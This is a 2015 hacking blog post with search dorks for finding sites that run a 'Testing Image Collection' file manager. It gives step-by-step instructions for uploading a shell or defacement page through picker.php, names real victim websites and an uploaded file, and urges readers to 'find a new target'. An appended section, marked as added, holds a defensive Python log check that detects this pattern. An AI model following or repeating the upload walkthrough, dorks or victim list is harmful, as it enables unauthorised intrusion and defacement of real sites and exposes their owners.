
Monday, 28 September 2015

"Testing Image Collection" shell and file upload vulnerability

Dorks: inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
       intitle:"Testing Image Collections"

Go to Google or Bing and type the dork inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections".
Now look at the search results in Google or Bing.
Select any site from the search results and look for the upload option.
Here is a demo of the upload button:
[Image: upload button]
Now select your shell or deface page and upload it.
To view your uploaded shell or deface page, go to:
http://website.com/files/yourfilehere or
http://websites.com/path/yourfilehere
Live demo:
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=&highlight_file=472
Result: http://www.bantamorloff.co.uk/files/backlinks.html
Other live examples:

http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0 
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0 
*UPDATE: The demo sites are patched now. Find a new target >:D<
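
For site owners running this file manager, the pattern described above (a visit to picker.php followed by a fetch of a non-image file under /files/) is visible in web server access logs. The following is an added example, not part of the original post: a log check that assumes combined log format in chronological order, with constructed sample lines and a hypothetical extension list.

```python
import re

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Sep/2015:10:01:02 +0000] "GET /modules/filemanagermodule/actions/picker.php?id=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Sep/2015:10:02:05 +0000] "GET /files/backlinks.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Sep/2015:10:02:30 +0000] "GET /files/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
198.51.100.4 - - [28/Sep/2015:10:03:00 +0000] "GET /files/team-photo.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Sep/2015:10:04:00 +0000] "GET /newsite/modules/filemanagermodule/actions/picker.php?id=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Sep/2015:10:04:20 +0000] "GET /newsite/files/notes.htm?v=1 HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# The file-manager endpoint named in the post, under any install prefix.
PICKER_RE = re.compile(r"/modules/filemanagermodule/actions/picker\.php", re.I)
# Assumption: an image collection's /files/ directory should not serve
# script or markup files; adjust the extension list to the site.
ACTIVE_RE = re.compile(r"/files/[^?#]*\.(php\d?|phtml|phar|html?|js|svg)(\?|$)", re.I)


def find_suspect_fetches(log_text):
    """Return (ip, timestamp, path) for active-content files under /files/
    that were served (HTTP 200) to a client that earlier opened picker.php."""
    picker_clients = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed log format
        ip, path, status = m["ip"], m["path"], int(m["status"])
        if PICKER_RE.search(path):
            picker_clients.add(ip)
        elif ip in picker_clients and status == 200 and ACTIVE_RE.search(path):
            findings.append((ip, m["ts"], path))
    return findings


if __name__ == "__main__":
    for ip, ts, path in find_suspect_fetches(SAMPLE_LOG):
        print(f"[{ts}] {ip} fetched {path} after opening picker.php")
```

This is a heuristic: legitimate HTML stored under /files/ will also match, so each hit should be checked against the files actually present in that directory.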
